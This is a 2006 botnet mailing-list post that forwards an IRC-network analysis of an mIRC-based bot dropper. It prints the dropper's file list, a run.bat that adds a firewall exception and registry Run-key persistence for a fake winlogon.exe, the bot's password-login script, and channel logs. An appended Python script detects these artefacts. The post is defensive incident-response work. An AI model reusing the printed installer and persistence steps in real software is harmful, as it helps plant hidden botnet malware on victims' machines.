To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
See attached message re: Israeli drone herders.
-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
--- Begin Message ---
Config.exe is a rarsfx package. Use unrar to unpack. When executed, the following configuration is used:

Path=C:\Windows\Config
Setup=run.bat
Silent=1
Overwrite=1

Filelist:

 Name                Size   Packed Ratio  Date   Time     Attr      CRC   Meth Ver
-------------------------------------------------------------------------------
 netsh.exe          86016    22533  26% 04-08-04 01:56 .....A 946E79D6 m3f 2.9
 psinfo.exe        131072    40244  30% 23-06-06 17:30 .....A 381466FB m3f 2.9
 pskill.exe         77824    23239  29% 04-04-04 11:04 .....A 3E9148D1 m3f 2.9
 reg.reg              183      154  84% 28-07-06 15:18 .....A D1333829 m3f 2.9
 remote.ini           947      142  14% 27-08-06 00:35 .....A 89F72B10 m3f 2.9
 run32.exe           6656     2251  33% 05-02-04 21:51 .....A F46B392A m3f 2.9
 run.bat              143      124  86% 29-07-06 16:41 .....A E12395AF m3f 2.9
 script1.ini         2191      828  37% 25-08-06 04:19 .....A 4EC8B057 m3f 2.9
 script2.ini          943      462  48% 25-08-06 04:17 .....A CC54C0E6 m3f 2.9
 script3.ini          360      236  65% 05-08-06 16:51 .....A 6DBC0DCA m3f 2.9
 script.ini          3487      858  24% 27-08-06 00:36 .....A 04018E3D m3f 2.9
 speed.bat             36       36 100% 30-07-06 18:33 .....A 2AAFE8C4 m0f 2.9
 tlist.exe          40720    17111  42% 27-02-06 18:13 .....A FD77615D m3f 2.9
 udix.exe          899132   409238  45% 28-07-06 14:20 .....A D6B1568E m3f 2.9
 vnc3.bat              76       76 100% 26-07-06 20:57 .....A 46CB49AF m0f 2.9
 vnc.exe            32768     5882  17% 28-07-06 14:50 .....A D9682F6D m3f 2.9
 VNC_bypauth.txt     1461      200  13% 26-08-06 04:18 .....A 9AD53290 m3f 2.9
 vncscan.exe        32768     5882  17% 28-07-06 14:50 .....A D9682F6D m3f 2.9
 wget.exe          308736   302075  97% 16-01-04 02:11 .....A B7B4CEA5 m3f 2.9
 whoami.exe         48128    20266  42% 23-06-06 17:30 .....A 4CE7D5C7 m3f 2.9
 winlogon.exe     1753088   622664  35% 04-04-04 11:01 .....A 23BD4AB8 m3f 2.9
 winvnc.bat           105       79  75% 02-08-06 20:34 .....A BF5DC663 m3f 2.9
 info.txt            2549      562  22% 27-02-06 07:42 .....A FAD4DD4B m3f 2.9
 VNC_bypauth.txt     1957      261  13% 27-02-06 07:49 .....A 68070F61 m3f 2.9
 aliases.ini          307      208  67% 05-02-04 21:51 .....A 16960B06 m3f 2.9
 control.ini           54       54 100% 27-08-06 00:35 .....A 729BFE08 m0f 2.9
 dfind.exe          65536    11722  17% 05-07-06 16:51 .....A D204A508 m3f 2.9
 Fport.exe         114688    51119  44% 23-06-06 17:29 .....A B100493A m3f 2.9
 info.txt            3309      702  21% 27-08-06 00:16 .....A 3FBF2125 m3f 2.9
 instsrv.exe        37888    15375  40% 27-02-06 18:13 .....A F0092F54 m3f 2.9
 kl32.exe           77824    23238  29% 04-04-04 11:04 .....A 3E9148D1 m3f 2.9
 mirc.ini            3344     1499  44% 27-08-06 00:35 .....A A7446C1C m3f 2.9
 mprapi.dll         87040    39050  44% 04-08-04 00:56 .....A D1E492AB m3f 2.9
 net.exe            42768    19840  46% 27-02-06 18:13 .....A BDAD7FD4 m3f 2.9
 download               0        0   0% 25-08-06 04:15 .D.... 00000000 m0  2.0
 logs                   0        0   0% 25-08-06 04:15 .D.... 00000000 m0  2.0
 sounds                 0        0   0% 26-08-06 14:15 .D.... 00000000 m0  2.0
-------------------------------------------------------------------------------
   37             3864104  1638210  42%

Contents of run.bat:

@echo off
netsh.exe firewall add allowedprogram C:\Windows\Config\winlogon.exe Winlogon ENABLE
regedit.exe /s reg.reg
run32.exe winlogon.exe

run.bat will try to add a firewall exception for winlogon.exe, which is simply a renamed mIRC executable. It will then try to install the following into the registry:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winlogon"="C:\\Windows\\Config\\run32.exe C:\\Windows\\Config\\winlogon.exe"

Bot authentication:

n104=on *:text:!login *:*:{
n105= if (($2 == [EMAIL PROTECTED]) && ($nick isop $chan)) {
n106= auser master $nick
n107= msg $Target Password Accepted
n108= }
n109=}

Existing bot masters:

n0=master:kan
n1=master:Cool-Man

Other interesting information:

n0=%bu 4
n1=%rrr 180
n2=%lalaosd on
n3=%vic 80.178.20.3
n4=%threads 100

Note the Israeli IP - it's an adsl line on the same ISP that kan appeared from.
On Tue, Aug 29, 2006 at 01:45:54PM -0400, pak000 babbled thus:
>
> Not sure what this one is, I've not seen it before, the channel is #ckbt
> and registered under the nick "kan"
>
> Channel topic is "http://www.sendspace.com/file/rfim2x !login [EMAIL PROTECTED]"
>
> The link, as another member of the network's staff informs me, is an HTML page
> containing some javascript for phishing, perhaps paypal. Also a link to a
> file called config.exe about 1MB in size
>
> All bots respond to a version with : mIRC v6.03 Khaled Mardam-Bey
>
> All respond to finger with: [1246] [hguxomj FINGER reply]: asdg4r4f ([EMAIL PROTECTED])
>
> /who of channel:
> #ckbt France-gax H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt DAmeShot H~ [EMAIL PROTECTED] :2 DAmeShot
> #ckbt hguxomj H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt gfmilyo H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt ikqdici H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt France-zff H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt fekufbc H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt mfkuxgq H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt kopdzmk H [EMAIL PROTECTED] :2 asdg4r4f
> #ckbt cjcuzaj H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt israel-ybn H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt xzencbj H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt txesyuy H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt txgljoj H [EMAIL PROTECTED] :1 asdg4r4f
> #ckbt End of /WHO list.
>
> [1235] -ChanServ- Information for channel #ckbt:
> [1235] -ChanServ- Founder: kan
> [1235] -ChanServ- Description: TOB
> [1235] -ChanServ- Registered: Aug 26 23:38:54 2006
> [1235] -ChanServ- Last used: Aug 29 11:31:09 2006
> [1235] -ChanServ- Last topic: http://www.sendspace.com/file/rfim2x !login [EMAIL PROTECTED]
> [1235] -ChanServ- Topic set by: kan
> [1235] -ChanServ- Options: Topic Retention, Secure
> [1235] -ChanServ- Mode lock: +nt
> [1236] -NickServ- dameshot is DAmeShot
> [1236] -NickServ- Last seen address: [EMAIL PROTECTED]
> [1236] -NickServ- Last seen time: Aug 28 02:33:51 2006
> [1236] -NickServ- Time registered: Aug 27 22:57:42 2006
> [1236] -NickServ- Last quit message: Ping timeout
> [1236] -NickServ- E-mail address: [EMAIL PROTECTED]
> [1236] -NickServ- Options: Security
> [1236] -NickServ- kan is Kan
> [1236] -NickServ- Is online from: [EMAIL PROTECTED]
> [1236] -NickServ- Time registered: Aug 26 23:33:57 2006
> [1236] -NickServ- Last quit message: Quit:
> [1236] -NickServ- E-mail address: [EMAIL PROTECTED]
> [1236] -NickServ- Options: Security
>
>
> pak000
> services administrator
> irc.zirc.org
_______________________________________________
irc-security mailing list
[EMAIL PROTECTED]
http://lists.irc-unity.org/mailman/listinfo/irc-security
--- End Message ---
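The installer described in the attached analysis has two artefacts a responder can check for on a suspect host: the Run-key value in reg.reg and the netsh firewall exception in run.bat, both pointing at a renamed mIRC binary called winlogon.exe under C:\Windows\Config rather than System32. The triage script below is an added example, not code from the post or the list; its two inputs are constructed copies of the reg.reg and run.bat snippets quoted above, and the SYSTEM_BINARIES set is an assumed starting list of names that only legitimately live under System32.

```python
import re
from pathlib import PureWindowsPath
# Constructed inputs: the reg.reg and run.bat contents quoted in the analysis above.
REG_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winlogon"="C:\\Windows\\Config\\run32.exe C:\\Windows\\Config\\winlogon.exe"
'''
RUN_BAT = r'''@echo off
netsh.exe firewall add allowedprogram C:\Windows\Config\winlogon.exe Winlogon ENABLE
regedit.exe /s reg.reg
run32.exe winlogon.exe
'''
# Assumed starting set: names that legitimately live only under %SystemRoot%\System32.
SYSTEM_BINARIES = {"winlogon.exe", "csrss.exe", "lsass.exe", "services.exe", "svchost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def parse_reg_run_entries(text):
    """Return (key, value_name, command) for each value under a ...\\Run or ...\\RunOnce key."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and key.lower().endswith(("\\run", "\\runonce")) and line.startswith('"'):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:  # .reg files escape backslashes as \\ inside string values
                entries.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries

def parse_firewall_exceptions(bat):
    """Return every program path added with 'netsh firewall add allowedprogram'."""
    pat = re.compile(r"netsh(?:\.exe)?\s+firewall\s+add\s+allowedprogram\s+(\S+)", re.I)
    return [m.group(1) for m in pat.finditer(bat)]

def masquerading_paths(command):
    """Whitespace-separated tokens named like a System32 binary but located elsewhere."""
    hits = []
    for tok in command.split():
        p = PureWindowsPath(tok)
        if p.name.lower() in SYSTEM_BINARIES and not str(p.parent).lower().startswith(SYSTEM_DIRS):
            hits.append(tok)
    return hits

def analyse(reg_text, bat_text):
    """Findings a triage script would report for the two installer artefacts."""
    findings = [f"Run value '{name}' launches masquerading {p}"
                for _, name, cmd in parse_reg_run_entries(reg_text) for p in masquerading_paths(cmd)]
    findings += [f"firewall exception added for masquerading {p}"
                 for path in parse_firewall_exceptions(bat_text) for p in masquerading_paths(path)]
    return findings
```

Paths are split on whitespace, so a quoted path containing spaces would need a proper command-line tokenizer before this check.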
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
